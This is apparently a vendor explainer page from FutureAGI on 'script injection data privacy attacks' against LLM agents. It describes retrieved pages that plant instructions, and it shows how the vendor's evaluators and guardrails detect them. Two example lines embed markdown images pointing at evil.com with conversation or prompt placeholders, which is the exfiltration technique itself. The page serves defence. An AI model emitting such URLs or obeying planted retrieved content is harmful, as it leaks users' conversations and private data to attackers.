Failure Modes

What Is a Script Injection Data Privacy Attack?

An LLM exploit class where attacker-supplied scripts run inside the application or a downstream tool to exfiltrate private data such as conversation, context, or PII.

What Is a Script Injection Data Privacy Attack?

A script injection data privacy attack is a class of LLM exploit where attacker-supplied content embeds executable scripts (HTML, JavaScript, SQL, shell, JSON-flavored payloads) that the application or a downstream tool runs, leaking private data such as conversation history, retrieved documents, system prompts, or user PII. It is the intersection of script injection and data exfiltration: the attacker doesn’t just hijack the model, they use the hijack to leak data. In production agent stacks, it surfaces as PII matches in tool arguments, unexpected outbound HTTP calls, and markdown that ships scripts to a renderer. FutureAGI detects it with PromptInjection, ProtectFlash, and PII.

Why It Matters in Production LLM and Agent Systems

The attack is dangerous because it exploits the seams between components — the model, the tool layer, and the renderer. The LLM may behave as instructed, but the script payload it produces gets executed downstream. A common pattern: an attacker writes a comment on a public page that the model retrieves; the comment includes a markdown image whose src is https://evil.com/log?data={conversation}. The renderer makes the request, leaking the conversation to the attacker server.

Engineers feel this when a “harmless” model output triggers an outbound request from a frontend or a SQL exception in a downstream service. SREs see anomalous egress traffic and spike alerts on tool-call argument size. Compliance leads need evidence that PII never left the boundary; without trace-level evaluator scores, they cannot prove it. Product teams discover the issue when a customer reports their conversation appearing in a third-party log.

In 2026 agent stacks, the attack surface is large. The retriever pulls in malicious context; the tool executor renders or executes the payload; the synthesis model passes scripts through to the user. Useful production symptoms: spikes in PromptInjection score on input or retrieved context, PII matches in tool arguments (especially URL parameters), unusual markdown patterns in outputs (image and link tags with query strings), and a sudden rise in outbound DNS resolutions to unfamiliar domains.

How FutureAGI Handles Script Injection Data Privacy Attacks

FutureAGI’s approach is to layer detection at each seam where script injection can hide. At the input edge, PromptInjection and the lighter-weight ProtectFlash score user input and retrieved context for injection patterns. At the output, PII evaluators check the response and every tool argument for regulated data, including URL parameters that look like exfiltration paths. At the runtime, Agent Command Center places a pre-guardrail to strip suspicious markdown, scripts, and HTML, and a post-guardrail to redact PII and validate URL schemes before the response reaches the user or the renderer.

A concrete example: a research-assistant agent retrieves web pages via a search tool and synthesises an answer. An attacker plants a page with markdown like ![logo](https://evil.com/log?d={prompt}). With traceAI-langchain instrumented, the retriever step writes a span containing the retrieved content. PromptInjection runs on the retrieved content; if the score crosses threshold, the response is rewritten and the trace is flagged. The post-guardrail validates URL schemes against an allow-list before the response reaches the markdown renderer. PII runs on the final response; any leaked context shows up in the score and the trace.

Unlike a single Lakera-style filter that runs once on user input, FutureAGI’s layered evaluators run on inputs, retrieved context, tool arguments, and final outputs. The trace evidence shows exactly where the attack landed, so the engineer can patch the right seam. The next action is operational: tighten the guardrail, add the trace to a regression set, and rotate the renderer to a sandboxed mode if the renderer is the leak path.

How to Measure or Detect It

Detection works best as multiple signals reading the same trace:

  • PromptInjection score on inputs and retrieved context — alert when score crosses a baseline; investigate retrieval source if it is the elevated step.
  • ProtectFlash lightweight pre-guardrail rate — high block rate indicates active probing; correlate with PromptInjection scores.
  • PII matches in tool arguments — any match in a URL or HTTP body argument is a red alert; never tolerate even one.
  • Egress signals — unfamiliar outbound domains in tool calls; unusual query-string lengths.
  • Markdown and HTML pattern checks — image, link, script tags with attacker-controlled query strings.
from fi.evals import PromptInjection, PII

inj = PromptInjection()
pii = PII()

i = inj.evaluate(input=user_input, retrieved=retrieved_text)
p = pii.evaluate(input=user_input, output=response, tool_args=tool_args)

If the trace lacks per-step scores, the attacker can hide between steps; instrument every seam.

Common Mistakes

  • Filtering only the user input. The attack lives in retrieved content; check inputs, retrieved context, and tool arguments.
  • Trusting markdown renderers. A renderer that fetches images is an exfiltration channel; sandbox or validate URL schemes.
  • No egress allow-list. Without an allow-list, any URL the model produces is a potential data path.
  • Confusing it with classic XSS. XSS targets browser execution; this attack targets the AI pipeline’s data path.
  • Running PII checks only on the final response. The leak often happens in tool arguments before the response is produced — check every step.

Frequently Asked Questions

What is a script injection data privacy attack?

It is an LLM exploit class where attacker-supplied content embeds executable scripts that the application or a downstream tool runs, leaking private data such as conversation history, retrieved documents, system prompts, or user PII.

How is it different from prompt injection?

Prompt injection manipulates the model's behavior by overriding its instructions. Script injection data privacy attacks aim specifically at data exfiltration by smuggling executable payloads — HTML, JavaScript, SQL, JSON — that downstream tools or renderers execute.

How do you detect a script injection data privacy attack?

FutureAGI runs PromptInjection and ProtectFlash for input filtering, plus PII evaluators on outputs and tool arguments. Egress monitoring on outbound URLs and unexpected schema fields complements the eval layer.